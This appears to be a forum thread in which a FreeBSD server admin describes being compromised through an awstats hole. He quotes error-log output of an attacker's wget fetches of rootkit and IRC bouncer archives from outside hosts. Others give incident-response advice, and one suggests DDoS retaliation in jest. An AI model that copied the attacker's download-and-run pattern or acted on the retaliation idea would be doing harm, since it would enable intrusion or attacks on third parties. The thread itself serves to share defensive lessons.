nothing ruins a day like getting hacked

[Soybomb]

So I was poking around httpd-errors today and found:

--07:04:28-- http://www.zaludu.home.ro/za.tgz
=> `za.tgz'
Resolving www.zaludu.home.ro... done.
Connecting to www.zaludu.home.ro[81.196.20.133]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10,141 [application/x-compressed]

0K ......... 100% 14.39 KB/s

07:04:32 (14.39 KB/s) - `za.tgz' saved [10141/10141]

%00/awstats.mysite.com.conf: not found
--07:05:06-- http://www.linux-help.as.ro/h
=> `h'
Resolving www.linux-help.as.ro... done.
Connecting to www.linux-help.as.ro[193.230.153.133]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

0K .......... .......... .......... .......... . 21.16 KB/s

07:05:11 (21.16 KB/s) - `h' saved [42481]

./h: 1: Syntax error: redirection unexpected
%00/awstats.mysite.com.conf: not found
wget: not found
chmod: h: No such file or directory
./h: not found
%00/awstats.mysite.com.conf: not found

Anyway a little panic set in and I quickly did a sockstat and saw among other things a connection to a foreign ip running sh and another program connected to a foreign ip running on port 6667. IRC and owned...yay. Anyway I'm guessing I missed a vulnerability in awstats that allows remote command execution and someone used that to download and unpack a rootkit. I'm still not sure how they got shell though since I would think it would be limited to the www user that the awstats script would run under.

Anyway moral of the story is be sure you not only keep your services patched but watch those dumb apps you've forgotten you have and be sure they're not the weak link. Also if you have any insight or ideas I'd love to hear them. I didn't want to risk someone noticing they were discovered and doing anything so I just grabbed my httpd-error logs and shutdown the server. I'll be able to do the autposy tomorrow.

 

[jamesbond007]

What distribution/kernel were you running?

 

[Soybomb]

freebsd 4.11

 

[InlineFive]

Another reason why I don't use IRC.

 

[cleverhandle]

Originally posted by: PorBleemo
Another reason why I don't use IRC.

The vuln had nothing to do with IRC. It was in awstats, an online site statistics script. The cracker ran an IRC daemon after he got access.

@Soybomb: Sucks dude, sorry. It's a good lesson, however, for limiting access even to legitimate services. There's probably little reason for letting a statistics script be accessible to everyone, so the directory could have been restricted to your local network by an .htaccess file. That being said, from what I can see of the vulnerability online, it shouldn't let anyone root you, unless there were other things misconfigured. If you have a Tripwire-like system to check out your system files, you might be OK. Of course, there's only one way to be certain unfortunately...

 

[Soybomb]

Sadly its been really busy lately and after updating the system last time to 4.11 I didn't update the tripwire database. I'm with you in that I think while they may have had a shell I don't see anything that would have let them escalate their privileges to root from www.

It looks like its been a real playground:
fm.tgz 174 kB 27 kBps
b.c 2124 B 318 kBps
psybnc.tgz 559 kB 52 kBps
psybnc.conf 77 B 194 kBps
override rwxr-xr-x www/wheel for sh? (y/n [n]) not overwritten
./bind: not found
./rat: not found
./mailme: not found
tar (child): tw.tar.gz: Cannot open: No such file or directory

In the interest of practice what you preach (and fear of a keystroke logger I don't find) I'm going to just suck it up and waste a day reformatting and restoring.

 

[jamesbond007]

Originally posted by: Soybomb
In the interest of practice what you preach (and fear of a keystroke logger I don't find) I'm going to just suck it up and waste a day reformatting and restoring.

Ouch, sounds like the hacker definitely had their fair share of fun. After you are done formatting, updating, etc, are you absolutely sure the person cannot get in again? Perhaps you should study the attack a bit more to be sure you find the source or weakspot.

At any rate, it's probably a good thing to do a restore, considering the number of files added to the server and who knows how many were modified.

Good luck with the restoration! Too bad we can't just report the URL/IP to someone who can DDOS the server to death. Then lets see the prick try to upload anything from it. Although, we would just be stooping down to their level of dumbass-ness...at least we'd have fun doing it though.

 

[skyking]

That blows, man. After reading this, I went through a few years of logs:Q
I really looked at all the attempts, and there were plenty. Then I purged it and started over. It sounds like you are in the clear, but I understand your resolution to nuke.

 

[drag]

Personally I would take the drive out and save it for later. (although I've been told that was a very bad idea).

Then I'd get a new harddrive and install from scratch, probably with the newest stable version of FreeBSD, if possible. I wouldn't trust any binaries from your system or any of your data files, unless you go over them with a fine tooth comb. Then the sucky part is looking at your other machines and making sure that they aren't comprimised too...

Like if you use the same root password on this machine and on another, then I figure it's safe to assume the other machine is comprimised too.. as well as any user accounts. Especially if you use telnet, ftp, and such were they can sniff passwords and such off of the local network. If I was a script kiddie and got a machine on a network with other servers or other machines, then I would take another machine over, play very low-key on that one, and then do my stuff on the machine I cracked first. That way I would always have a back-door onto the network if they find, fix, and secure the machine that I am playing with.

 

[Nothinman]

Another reason why I don't use IRC.

Email is probably more dangerous than IRC.

 

[Soybomb]

Originally posted by: jamesbond007

Originally posted by: Soybomb
In the interest of practice what you preach (and fear of a keystroke logger I don't find) I'm going to just suck it up and waste a day reformatting and restoring.

Ouch, sounds like the hacker definitely had their fair share of fun. After you are done formatting, updating, etc, are you absolutely sure the person cannot get in again? Perhaps you should study the attack a bit more to be sure you find the source or weakspot.

At any rate, it's probably a good thing to do a restore, considering the number of files added to the server and who knows how many were modified.

Good luck with the restoration! Too bad we can't just report the URL/IP to someone who can DDOS the server to death. Then lets see the prick try to upload anything from it. Although, we would just be stooping down to their level of dumbass-ness...at least we'd have fun doing it though.

Quite positive it was awstats that they found their way in through. I'm either going to find a new stats package that I can install and forget and/or .htaccess it too. I wont ddos, but I vote we all block russia at the router until they start arrestinig people

I'd consider new drives just to poke around and see what all was done but its raid so thats a bit of cash to drop for fun. You're right though drag, I do not look forward to checking other machines in its ipblock, but honestly I don't think they went for them. If I had to guess they used google to find vulnerable instances of awstats, compromised them, and installed their irc bots that linked in a botnet for ddos. I think actually trying other exploits was too much effort. I do hope that they didn't get root locally though so I don't have to worry about keystroke loggers.

 

[jamesbond007]

Just a FYI, .ro means it was a machine in Romania. Think it'd be worth your time to swap emails from the owner of the address?

Right now I'm checking out www.home.ro. My guess is that http://www.zaludu.home.ro/ was a homepage of some user on the home.ro network. If you send an email to the admins/abuse lines at home.ro, you might get some action taken, providing you save the logs. The URL looks a lot like username.aol.com for AOL users' homepages. It's just a guess, but it might be worth a shot to get back at this user.

Perhaps they can ban the user on the network or ISP? If you need help translating things, I have several foreign contacts who can do English > Romanian and Romanian > English translations.

 

[Soybomb]

Ohhh yeah wrong extension/country..doh....down with romania!

Cool thanks for the translation help I might take you up on it later. When I get to the machine I'm going to pick apart the shell and see if I can get an IP where the user was, I bet its not the same as where he pulled the tools from.

 

[n0cmonkey]

These web applications are getting bigger and buggier. I'm liking them less and less, and liking systrace more and more.